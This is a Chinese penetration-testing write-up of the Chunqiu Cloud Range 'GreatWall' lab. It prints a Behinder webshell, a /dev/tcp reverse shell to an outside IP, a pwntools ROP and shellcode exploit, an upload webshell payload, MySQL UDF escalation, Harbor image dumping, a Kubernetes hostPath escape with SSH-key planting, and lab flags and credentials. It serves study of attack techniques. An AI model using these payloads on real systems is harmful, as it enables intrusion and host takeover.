官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
模拟实战靶标系列之春秋云镜GreatWall
- 关注
模拟实战靶标系列之春秋云镜GreatWall
本文由
创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
模拟实战靶标之春秋云镜GreatWall
外网tp打点
开局有个tp,工具嗦一下。存在RCE漏洞,点击Getshell写个冰蝎木马
密码为rebeyond
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION["k"]=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded("openssl"))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode("|",$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
连接冰蝎木马上传一个可解析的 1.php 文件读取
<?=`$_GET[1]`;echo md5(1);?>访问进行反弹shell
1.php?1=bash -c "bash -i >%26 %2fdev%2ftcp%2f111%2e229%2e158%2e40%2f3333 0>%261配合一波,修改为交互Shell+ Frp内网穿透出来,上文有说明
内网Shiro利用
上传后进行挂代理,访问内网资源。上传fscan扫描
172.28.23.26:21 open
172.28.23.17:22 open
172.28.23.33:8080 open
172.28.23.17:8080 open
172.28.23.26:80 open
172.28.23.26:22 open
172.28.23.17:80 open
172.28.23.33:22 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle http://172.28.23.17:8080 code:200 len:1027 title:Login Form
[*] WebTitle http://172.28.23.17 code:200 len:10887 title:""
[*] WebTitle http://172.28.23.26 code:200 len:13693 title:新翔OA管理系统-OA管理平台联系电话:1****48微信同号,QQ95****3
[+] ftp 172.28.23.26:21:anonymous
[->]OASystem.zip
[*] WebTitle http://172.28.23.33:8080 code:302 len:0 title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=1396A1D8359BFFDE444D2D448474E67E
[*] WebTitle http://172.28.23.33:8080/login;jsessionid=1396A1D8359BFFDE444D2D448474E67E code:200 len:3860 title:智联科技 ERP 后台登陆
[+] PocScan http://172.28.23.17:8080 poc-yaml-thinkphp5023-method-rce poc1
[+] PocScan http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2
组合拳漏洞 /actuator/heapdump泄露-> JDumpSpider-1.1-SNAPSHOT-full.jar-> 获取到shiro key
key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES上shiro summer工具直接爆破利用链,注意这里选择为如下
植入内存马
pwn二进制
信息 nc 172.28.23.33 59696
www-data@portal:/tmp$ ./f -h 172.28.23.33 -p 1-65535
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.28.23.33 is alive
[*] Icmp alive hosts len is: 1
172.28.23.33:22 open
172.28.23.33:8080 open
172.28.23.33:59696 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://172.28.23.33:8080 code:302 len:0 title:None 跳转url: http://172.28.23.33:8080/login;jsessionid=17FB34D9B99ED0D3645129276D3A5
[*] WebTitle: http://172.28.23.33:8080/login;jsessionid=17FB34D9B99ED0D3645129276D3A5 code:200 len:3860 title:智联科技 ERP 后台登陆
[+] http://172.28.23.33:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.28.23.33:8080 poc-yaml-springboot-env-unauth spring2
from pwn import *
elf = ELF('./HashNote')
context(arch=elf.arch, os='linux', log_level='debug')
# p = process('./HashNote')
p = remote('172.28.23.33', 59696)
def send_command(command):
p.sendlineafter(b': ', str(command))
def add_entry(key, value):
send_command(1)
p.sendlineafter(b'Key: ', key)
p.sendlineafter(b'Data: ', value)
def get_entry(key):
send_command(2)
p.sendlineafter(b'Key: ', key)
def update_entry(key, value):
send_command(3)
p.sendlineafter(b'Key: ', key)
p.sendlineafter(b'Data: ', value)
def set_username(value):
send_command(4)
p.sendafter(b'New username: ', value)
# Authenticate
p.sendlineafter(b'Username: ', b'123')
p.sendlineafter(b'Password: ', b'freep@ssw0rd:3')
# Add entries to setup the environment
add_entry(b'aabP', b'aaaaaaaa')
add_entry(b'aace', b'C' * 0xc0)
# Shellcode to spawn a shell
sc = [
b'\x6a\x3b', # push 0x3b
b'\x58', # pop rax
b'\x99', # cdq
b'\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68', # movabs rbx, 0x68732f6e69622f2f
b'\x53', # push rbx
b'\x48\x89\xe7', # mov rdi, rsp
b'\x52', # push rdx
b'\x57', # push rdi
b'\x48\x89\xe6', # mov rsi, rsp
b'\x0f\x05' # syscall
]
shellcode = b''.join(sc)
username_addr = 0x5dc980
fake_obj_addr = username_addr + 0x10
def arbitrary_read(addr):
payload = p64(fake_obj_addr)
payload += p64(0xdeadbeef)
fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
fake_obj += b'aahO'.ljust(0x10, b'\x00')
fake_obj += p64(addr) + p64(8) + b'aaaaaaaa'
payload += fake_obj
payload += shellcode
payload = payload.ljust(128, b'\x00')
set_username(payload)
get_entry(b'aahO')
def arbitrary_write(addr, data):
payload = p64(fake_obj_addr)
payload += p64(0xdeadbeef)
fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
fake_obj += b'aahO'.ljust(0x10, b'\x00')
fake_obj += p64(addr) + p64(len(data)) + b'aaaaaaaa'
payload += fake_obj
payload += shellcode
payload = payload.ljust(128, b'\x00')
set_username(payload)
update_entry(b'aahO', data)
# Leak the stack address
environ = 0x5e4c38
arbitrary_read(environ)
stack_addr = u64((p.recvuntil(b'\x7f', drop=False)[-6:].ljust(8, b'\0')))
success('stack_addr', stack_addr)
# ROP gadgets
rdi = 0x0000000000405e7c
rsi = 0x000000000040974f
rax = 0x00000000004206ba
rdx_rbx = 0x000000000053514b
shr_eax_2 = 0x0000000000523f2e
syscall_ret = 0x00000000004d9776
# ROP payload to map memory and jump to shellcode
payload = p64(rdi) + p64(username_addr & ~0xfff) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(0xa << 2) + p64(shr_eax_2) + p64(syscall_ret) + p64(username_addr + 0x48)
arbitrary_write(stack_addr - 0x210, payload)
p.sendline(b'uname -ar')
p.interactive()
内网新翔OA
审计代码,命令执行。代码为Ftp 匿名登录泄露
<?php
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
$type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
/uploadbase64.php
POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
imgbase64=data:image/php;base64,PD89YCRfR0VUWzFdYDtldmFsKCRfUE9TVFsxXSk7Pz4=
绕过disable_function需要编辑生成的文件
写入一个新的cmd.php,利用.antproxy.php去加载
<?php system($_GET['cmd']);?>
# 访问执行
/upload/.antproxy.php?cmd=ls
# 直接查看存在高权限的目录 /usr/bin,发现base32提权
/upload/.antproxy.php?cmd=base32%20/flag02.txt
内网Harbor未授权漏洞
主机172.22.14.46存在CVE-2022-46463未授权指令如下
proxychains python3 harbor.py http://172.22.14.46
-----
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret
proxychains python3 harbor.py http://172.22.14.46 --dump harbor/secret --v2
-----
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib64/proxychains-ng/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.17
[+] Dumping : harbor/secret:latest
[+] Downloading : 58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
[+] Downloading : b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01
[+] Downloading : da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1
[+] Downloading : fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e
[+] Downloading : 413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
[+] Downloading : 8bd8c9755cbf83773a6a54eff25db438debc22d593699038341b939e73974653
# 镜像文件查看到flag5
cat 413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt
-----
flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}#
分析镜像文件,发现运行了 run.sh,内容如下:
cat 90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c/run.sh
-----
#!/bin/bash
sleep 1
# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null#
分析 ProjectAdmin-0.0.1-SNAPSHOT.jar。反编译,在 SpringBoot 配置文件 application.properties中找到数据库账号密码:
spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
挂全局代理,直接渗透mssql
mssql+udf提权
全局代理,利用用户root,密码My3q1i4oZkJm3连接 172.22.10.28配合版本进行UDF提权
show global variables like '%secure_file_priv%';
/usr/lib/mysql/plugin/
select unhex('7F454C4602010100000000000000000003003...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
create function sys_eval returns string soname 'mysqludf.so';
select sys_eval('cat /f2ag06_Aq1aqx.txt');
UDF提权成功
K8S
参考:https://xz.aliyun.com/t/14986?time__1311=GqAh0KAKY5DK7KDs6YYK0%3DDO8wMSn11oaoD#toc-8fscan搜集信息
www-data@portal:/tmp$ ./f -h 172.22.14.37 -p 1-655351
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.14.37 is alive
[*] Icmp alive hosts len is: 1
172.22.14.37:22 open
172.22.14.37:2379 open
172.22.14.37:2380 open
172.22.14.37:6443 open
172.22.14.37:10256 open
172.22.14.37:10250 open
172.22.14.37:10251 open
172.22.14.37:10252 open
[*] alive ports len is: 8
start vulscan
[*] WebTitle: http://172.22.14.37:10252 code:404 len:19 title:None
[*] WebTitle: http://172.22.14.37:10251 code:404 len:19 title:None
[*] WebTitle: https://172.22.14.37:6443 code:200 len:4671 title:None
[*] WebTitle: http://172.22.14.37:10256 code:404 len:19 title:None
[*] WebTitle: https://172.22.14.37:10250 code:404 len:19 title:None
[+] https://172.22.14.37:6443 poc-yaml-go-pprof-leak
[+] https://172.22.14.37:6443 poc-yaml-kubernetes-unauth
evil.yaml
└─# cat evil.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.8
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
D:\内网\K8s工具利用>kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil.yaml
Please enter Username: test
Please enter Password: deployment.apps/nginx-deployment configured
D:\内网\K8s工具利用>
D:\内网\K8s工具利用>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: test
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-75g9w 1/1 Running 0 17s
D:\内网\K8s工具利用>
D:\内网\K8s工具利用>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment -- /bin/bash
Please enter Username: test
Please enter Password: Error from server (NotFound): pods "nginx-deployment" not found
D:\内网\K8s工具利用>
D:\内网\K8s工具利用>kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-75g9w -- /bin/bash
Please enter Username: test
Please enter Password: root@nginx-deployment-864f8bfd6f-75g9w:/#
root@nginx-deployment-864f8bfd6f-75g9w:/#
root@nginx-deployment-864f8bfd6f-75g9w:/# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDA6ZrWvEavoM39593UheEiZbeLbprBkdCkhN1qtYxgMMLKpy6foJQNmG5ulysO6S4YDJSHYTkSJbm+kOl9sPFDUTlr8bDkdtzGLbtxEiyHzYkPGEDfEbppX5uRzOxSXKpqY3Lork38ZtYjcQhuMDeC5y5WPAUwQ0dRtDY6d843qrZ+P1bD9DKuqcdIsByCbo7py94965e+rAcz4ihKZDkAeZLpnU0t6zB55+Ww01MUddeP0uNoNtVJ71M8EWyGTS07BuHNhp26zoXRMZi2bN2s5hY9nY2lzyfUL0WNoZ+EFHfd6PtH2EHhISL5MErm3KrgDfvUaw8GsZaFwWXrdZxOp0t3e+8mfSSQt1AvagB7K8go6TOnqAIlIa2XLnM3vrlfS0LN2B82EPtrVQDq5sGgQ+J0sv1u3JJVx8Di1B9H+lBxo3kvbiAklvn1OfQuiDt3Rq8jYf6nNxMxr87sfuGsXrvPBksD2FXx10WxsKDFjGAkSbUfLfrTp1IYLtCxabs= root@kali" > /mnt/root/.ssh/authorized_keys
root@nginx-deployment-864f8bfd6f-75g9w:/#
再利用Kali 进行免密登录SSH
┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDA6ZrWvEavoM39593UheEiZbeLbprBkdCkhN1qtYxgMMLKpy6foJQNmG5ulysO6S4YDJSHYTkSJbm+kOl9sPFDUTlr8bDkdtzGLbtxEiyHzYkPGEDfEbppX5uRzOxSXKpqY3Lork38ZtYjcQhuMDeC5y5WPAUwQ0dRtDY6d843qrZ+P1bD9DKuqcdIsByCbo7py94965e+rAcz4ihKZDkAeZLpnU0t6zB55+Ww01MUddeP0uNoNtVJ71M8EWyGTS07BuHNhp26zoXRMZi2bN2s5hY9nY2lzyfUL0WNoZ+EFHfd6PtH2EHhISL5MErm3KrgDfvUaw8GsZaFwWXrdZxOp0t3e+8mfSSQt1AvagB7K8go6TOnqAIlIa2XLnM3vrlfS0LN2B82EPtrVQDq5sGgQ+J0sv1u3JJVx8Di1B9H+lBxo3kvbiAklvn1OfQuiDt3Rq8jYf6nNxMxr87sfuGsXrvPBksD2FXx10WxsKDFjGAkSbUfLfrTp1IYLtCxabs= root@kali
┌──(root㉿kali)-[~/.ssh]
└─# proxychains ssh -i id_rsa root@172.22.14.37
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 111.229.158.40:6001 ... 172.22.14.37:22 ... OK
The authenticity of host '172.22.14.37 (172.22.14.37)' can't be established.
ED25519 key fingerprint is SHA256:HoDMJEcuW20qdBht/lh1c7lgi7TqtEVQK5Dh2X9zVlI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.22.14.37' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Welcome to Alibaba Cloud Elastic Compute Service !
Last login: Mon Mar 25 16:55:32 2024 from 36.112.10.1
读取flag4
root@ubuntu-k8s:~# cat .mysql_history
_HiStOrY_V2_
show\040databases;
create\040database\040flaghaha;
use\040flaghaha
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag06`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag06`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
show\040tables;
drop\040table\040flag06;
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag04`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag04`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
INSERT\040INTO\040`flag`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
INSERT\040INTO\040`flag04`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
exit
root@ubuntu-k8s:~#
解密获得flag4
结:一步一脚印,后续靶标系列还会持续更新。欢迎师傅们交流学习,靶标来源春秋云镜平台
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
- 0 文章数
- 0 关注者